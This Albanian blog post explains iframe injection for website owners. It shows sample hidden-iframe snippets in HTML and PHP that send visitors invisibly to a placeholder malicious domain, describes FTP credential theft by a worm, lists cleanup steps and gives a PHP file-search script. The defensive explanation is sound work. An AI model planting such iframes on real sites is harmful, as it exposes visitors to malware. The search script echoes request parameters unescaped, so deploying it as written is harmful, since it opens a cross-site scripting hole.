Ҫfarë është Iframe Injection?

Ky është një tekst informativ i shkurtër në të cilën shpjegohet, çfarë është dhe si largohet një IFrame injection. Kam hasur nëpër disa faqe të cilat janë të sulmuar...

Ky është një tekst informativ i shkurtër në të cilën shpjegohet, çfarë është dhe si largohet një IFrame injection.

Kam hasur nëpër disa faqe të cilat janë të sulmuar me këto lloj sulmesh, dhe vendosa të shkruaj një shkrim të vogël, rreth kësaj problematike.

IFrame është shkurtesë prej inline-frame. Bëhet fjalë për një HTML element. Fillimisht shërben për të ridrejtuar nga një faqe HTML në një tjetër, ose në një objektiv tjetër të caktuar. Eshtë shumë element i nevojshëm, i cili ka një fushë të gjerë të veprimit, dhe kuptohet me shumë mundësi të saja. Por, si gjithmon, roli i saj mund të jetë i mirë por edhe i keq. IFrame sulmet shërbehen me IFrame elemente për tu futur në faqe te caktuara. Këto lloj sulme çdo herë i sulmojn index.* dosjet, dosje në server si psh. index.html,index.phpindex.xhtml e kështu me radhë.

Si fillim pa humbur kohë, shkojm me shembull se si duket kodi në një faqe ku vendoset ky kodë, keqbërës(IFrame injection).

Për .html dosjet futet në mënyrën e mëposhtme:

<iframe src=”http://youwin2000euro_fake_eshte.biz/?click=9A1FA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

pra siq po e shihni kjo përdoret për tu ridrejtuar nga një faqe në tjetër, në rastin tonë linku ku ridrejtohen vizitorët e faqës tonë është.

http://youwin2000euro_fake_eshte.biz/?click=9A1FA

Ku më pas vizitorët e faqës tënde mund të ndeshen me shumë reziqe, një prej tyre të infektohen me ndonjë kodë maliciozë, reklama të ndryshme etj.

Vazhdojm me shembull se si duket kodi iframe i futur në php.

echo “<iframe src=”http://youwin2000euro_fake_eshte.biz/?click=9A1FA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;

Në çfarë mënyre mund dikush të vjen deri tek kodi i faqes tuaj?

Egzistojnë disa mënyra për të arritur këtë:
1. Të futen nga serveri i infektuar, ku jeni të hostuar.
2. Të futen përmes FTP klientit, tuaj.

Në rastin e parë serverët kanë disa lëshime sigurie të caktuara, me çka në rast se infektohet në ndonjë mënyrë serveri, atëherë të gjitha faqet e hostuara në të gjithashtu infektohen nga ky sulm.
Në rastin e dytë webmasteri/administratori i faqes ka komjuter të infektuar, më çka në këtë rast vetëm faqja e tij është e sulmuar, më sakt vetëm faqja ku ka kyçje përmes protokolit të FTP-së.

Në momentin kur të shkruani emrin tuaj përdorues(username) ose fjalëkalimin tuaj(password), për tu kyçur në faqen tuaj, krimbi(worm) atë do ta mbaj mend dhe pastaj pa dijenin tuaj do të bashkon serverin, dhe më pas mund të fus gjithcka në të(faqen tuaj), dhe kur të dojë, këtë sigurisht askush nuk e dëshiron, dhe zgjidhja për këtë është backup i rregullt.

Nëse IFrame futet vetëm në fund të çdo index dosjes, backup-i nuk është zgjidhje e domozdoshme, mund të pastroni në mënyrë manuale, por nëse kjo futet edhe në filet tjera default, dhe fshin ndonjë dosje nga ftp-ja yte atëherë në këtë rast, zgjidhje mund të kërkoni vetëm me ndonjë backup.

Si të mbrohemi, nga këto sulme?

Pasi të kuptoni se jeni të infektuar me iframe, fillimisht çfar duhet bërë është, të bëni nje scan kompjuterin tuaj, me ndonjë antivirus(ju rekomandoj ndonjë program si BitDefender, ose Kaspersky) për të fshirë krimbin(worm), në komjuterin tuaj. Pas kësaj është e detyrueshme të ndryshoni fjalëkalimin(passwordin) e FTP-së, me të cilën u kyçni në faqen tuaj.

Më pas duhet të lajmëroni kompanin ku jeni të hostuar për këtë sulm, me qëllim që ky infektim mos të përhapet edhe në faqet tjera. Hapi tjetër çfar duhet bërë është të ndryshoni permissions të fileve. Ne hapin e radhës duhet të largoni të gjitha index.* dosjet nga serveri, ti pastroni të njejtat në mënyrë manuale, sepse mënyrë tjetër nuk egziston(ka shum skripta që pretendojnë se e kryejnë këtë punë, por mund të ndodh që skripta të fshin diçka që nuk duhet etj). Nëse keni shum index.* dosje, egziston një skriptë PHP, e cila ngarkohet në host, ose më sakt në faqen tuaj, në root follderin, e cila kërkon dosje të caktuar ne faqe, normalisht këtë skript do e emëroni ne fund me .php, dhe më pas në të do të kyçeni diçka kështu.

www.faqja-e-infektuar.com/skripta.php?s=index.php&c=iframe

Si fund, shkronja S paraqet search(kërkon), cilin follder ose dosje, kurse C paraqe tekst të cilën duhet të kerkon (në rastin tonë ajo do të ishte iframe), më pas do të ju shfaqen rezultatet e kërkimit me të gjitha filet index.* të cilat kanë iframe kod. Më pas ju në mënyrë manuale dosjet do ti pastroni nga kodet iframe të futura në faqen tënde, dmth duhet të ceki dhe kuptoni se kjo skript që do të postoj më posht nuk e kryen funksionin për pastrim, por vetëm për kërkim.

Skripta PHP?

<?php 

$filename = $_GET[“s”];
$content_pattern = $_GET[“c”];
echo “Searching for $content_pattern in “.$filename.”</br>”;

//define the path as relative
$path = “.”;
$webpath =”Type your domain name here. Eg:http://www.itshqip.com/”;

//using the opendir function
$dir_handle = @opendir($path) or die(“Unable to open $path”);

echo “Directory Listing of $path<br/>”;

list_dir($dir_handle,$path,$filename,$content_pattern);

function list_dir($dir_handle,$path,$filename_pattern,$content_pattern)
{
// print_r ($dir_handle);
echo “<ol>”;
//running the while loop
while (false !== ($file = readdir($dir_handle))) {
$dir =$path.’/’.$file;
if(is_dir($dir) && $file != ‘.’ && $file !=’..’ )
{
$handle = @opendir($dir) or die(“undable to open file $file”);
list_dir($handle, $dir, $filename_pattern, $content_pattern);
}elseif($file != ‘.’ && $file !=’..’)
{
if(strcmp(“$file”, “$filename_pattern”)==0){
echo “<li><a href=’$webpath.$dir’>$webpath.$dir</a></li>”;

$handle = @fopen($dir, “r”);
if ($handle) {
while (!feof($handle)) {
$content = fgets($handle);
$test = stristr($content, $content_pattern);
echo $test;

}
fclose($handle);
}
}
}
}

echo “</ol>”;

closedir($dir_handle);
}
?>

Autorin origjinal të skriptes mund ta gjeni këtu./itshqip.com

RELATED BY